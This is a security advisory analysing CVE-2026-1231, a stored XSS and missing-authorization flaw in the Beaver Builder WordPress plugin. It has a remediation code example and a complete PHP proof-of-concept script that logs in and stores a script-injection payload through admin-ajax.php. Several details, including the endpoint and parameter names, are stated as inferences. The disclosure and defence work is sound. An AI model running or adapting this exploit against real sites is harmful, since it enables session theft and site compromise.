Atomic Edge analysis of CVE-2026-1231 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Beaver Builder Page Builder plugin for WordPress, affecting versions up to and including 2.10.0.5. The issue resides in the plugin’s Global Settings functionality, allowing attackers with ‘Custom+’ level access and Beaver Builder permissions to inject arbitrary JavaScript. The injected scripts execute for any user viewing a compromised page, leading to a client-side security breach.
Atomic Edge research identifies two root causes based on the CVE description and CWE-79 classification. The first confirmed issue is a missing capability check in the `save_global_settings()` function. This allows users with lower-level ‘Custom+’ roles to call a function intended for higher-privileged administrators. The second inferred issue is insufficient input sanitization and output escaping on the `js` Global Settings parameter. The plugin likely fails to properly sanitize user input before storing it in the database and does not escape it upon output in a page context.
Exploitation requires an authenticated attacker with ‘Custom+’ access and Beaver Builder permissions granted by an administrator. The attack vector is likely a WordPress AJAX handler or a REST API endpoint that processes the `save_global_settings` action. The attacker would send a POST request to `/wp-admin/admin-ajax.php` with an `action` parameter like `fl_ajax_save_global_settings`. The payload would be placed in a parameter named `js` or within a `settings` array containing a `js` key. A typical payload would be `alert(document.domain)` or a more malicious script designed to steal session cookies.
Effective remediation requires addressing both security flaws. The patched version 2.10.0.6 likely adds a proper capability check, such as `current_user_can('manage_options')`, to the `save_global_settings()` function. The fix must also implement robust input sanitization using functions like `wp_kses_post()` for the `js` parameter before storage. Additionally, the plugin must apply proper context-aware output escaping, such as `esc_js()` or `wp_json_encode()`, when rendering the stored JavaScript on the front end.
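As an added illustration of the remediation pattern described above (this is example code, not the plugin's actual patch and not Atomic Edge's code), the following hypothetical AJAX handler puts the controls together: a nonce check, the capability check on `manage_options` that the analysis identifies as the missing root-cause control, sanitization before storage, and context-aware escaping on output. The action name `fl_ajax_save_global_settings`, the `js` parameter, the option key `example_global_settings`, the nonce action name and the helper function names are all assumptions for the example; none of them is confirmed by the analysis.

```php
<?php
// Added example (hypothetical): a hardened global-settings save handler for a WordPress plugin.
// Assumed names: the AJAX action `fl_ajax_save_global_settings`, the `js` field, and the
// option key `example_global_settings`. The analysis infers these; the plugin's real names may differ.

add_action( 'wp_ajax_fl_ajax_save_global_settings', 'example_save_global_settings' );

function example_save_global_settings() {
    // 1. CSRF protection: the request must carry a nonce issued for this specific action.
    //    check_ajax_referer() terminates the request with -1 when the nonce is absent or invalid.
    check_ajax_referer( 'example_global_settings_nonce', 'nonce' );

    // 2. Authorization: the capability check the analysis reports as missing. A 'Custom+' user
    //    without manage_options is rejected here, before any input is touched.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Sanitize before storage: wp_unslash() undoes WordPress's request slashing, then
    //    wp_kses_post() removes markup outside the allowed post whitelist, so a closing
    //    </script> followed by attacker-supplied tags does not survive into the option.
    $raw_js = isset( $_POST['js'] ) ? wp_unslash( $_POST['js'] ) : '';
    $clean  = wp_kses_post( $raw_js );

    update_option( 'example_global_settings', array( 'js' => $clean ) );
    wp_send_json_success( array( 'saved' => true ) );
}

// 4. Escape on output: the stored value is rendered inside a <script> block, so it is emitted as a
//    JSON string literal. wp_json_encode() escapes quotes and forward slashes, which turns a stored
//    "</script>" into "<\/script>" and keeps the browser inside the intended script element.
function example_render_global_js() {
    $settings = get_option( 'example_global_settings', array( 'js' => '' ) );
    $js       = isset( $settings['js'] ) ? $settings['js'] : '';
    echo '<script>var exampleGlobalJs = ' . wp_json_encode( $js ) . ';</script>';
}
add_action( 'wp_footer', 'example_render_global_js' );
```

One design caveat worth stating plainly: the example treats the stored value as data rather than as code to execute. If the product requires the saved text to run as JavaScript on every page, output escaping cannot apply, and the remaining defenses are the nonce, the authorization gate, and restricting who may save raw script at all (WordPress core gates raw script in the Custom HTML widget on the `unfiltered_html` capability, which is a tighter gate than `manage_options` on multisite installs). Whichever gate is chosen, the capability check must run before the value is stored, since stored XSS is triggered at render time for every visitor, long after the save request has finished.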
Successful exploitation leads to stored XSS attacks. Injected scripts execute in the browser of any user visiting a page where the malicious global setting is loaded. This can result in session hijacking, account takeover, defacement, or redirection to malicious sites. Attackers can perform actions on behalf of victims, potentially escalating privileges if an administrator views the compromised page. The scope is changed (S:C in CVSS), meaning the impact can spread to other site components beyond the plugin itself.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1231 - Beaver Builder Page Builder – Drag and Drop Website Builder <= 2.10.0.5 - Authenticated (Custom+) Missing Authorization to Stored Cross-Site Scripting via Global Settings
<?php
/**
 * Proof of Concept for CVE-2026-1231.
 * This script demonstrates the authenticated Stored XSS vulnerability in Beaver Builder Lite <= 2.10.0.5.
 * Assumptions based on metadata:
 *   1. The vulnerable endpoint is `/wp-admin/admin-ajax.php`.
 *   2. The AJAX action is related to saving global settings, likely `fl_ajax_save_global_settings`.
 *   3. The malicious payload is delivered via a parameter named `js`.
 *   4. The attacker has valid WordPress credentials with 'Custom+' role and Beaver Builder access.
 */
$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
$username   = 'attacker_user';     // CHANGE THIS
$password   = 'attacker_password'; // CHANGE THIS

// Payload to inject. This is a simple alert for demonstration.
// In a real attack, this could be script to steal cookies or session tokens.
$malicious_js_payload = '</script><script>alert("Atomic Edge XSS - "+document.domain);</script>';

// Initialize cURL session for WordPress login to obtain authentication cookies.
$ch        = curl_init();
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);

// Prepare login POST data.
$login_fields = [
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url,
    'testcookie'  => '1',
];
$login_query = http_build_query($login_fields);

curl_setopt_array($ch, [
    CURLOPT_URL            => $login_url,
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => $login_query,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER         => true,          // We need the response headers to capture cookies.
    CURLOPT_COOKIEJAR      => 'cookies.txt', // Store cookies for subsequent requests.
    CURLOPT_COOKIEFILE     => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_USERAGENT      => 'Atomic Edge PoC Client/1.0',
]);
$login_response = curl_exec($ch);
$http_code      = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code !== 200) {
    die("Login request failed with HTTP code: $http_code");
}

// Check for a successful login indicator in the response body.
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    die('Login likely failed. Check credentials.');
}
echo "[*] Successfully logged in as $username\n";

// Now send the malicious AJAX request to exploit the missing authorization and sanitization.
// The action name is inferred from common Beaver Builder patterns and the function name.
$exploit_action = 'fl_ajax_save_global_settings';

// Build the POST data for the global settings save.
// The `js` parameter is the vulnerable field.
$exploit_fields = [
    'action' => $exploit_action,
    'js'     => $malicious_js_payload,
    // Nonce may be required but is often missing in vulnerable implementations.
    // The description states missing capability check, implying nonce may also be absent or bypassable.
    // We assume the request works without a nonce due to the vulnerability.
];
curl_setopt_array($ch, [
    CURLOPT_URL            => $target_url,
    CURLOPT_POSTFIELDS     => $exploit_fields,
    CURLOPT_HEADER         => false, // We don't need headers for this response.
    CURLOPT_RETURNTRANSFER => true,
]);
$exploit_response  = curl_exec($ch);
$exploit_http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($exploit_http_code === 200) {
    echo "[*] Exploit request sent. HTTP 200 received.\n";
    echo "[*] Response: $exploit_response\n";
    echo "[*] The malicious JavaScript payload should now be stored in the global settings.\n";
    echo "[*] Visit any page built with Beaver Builder to trigger the XSS.\n";
} else {
    echo "[!] Exploit request failed with HTTP code: $exploit_http_code\n";
    echo "[!] The endpoint or action name may be incorrect, or the plugin is patched.\n";
}

// Clean up the cookie file.
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>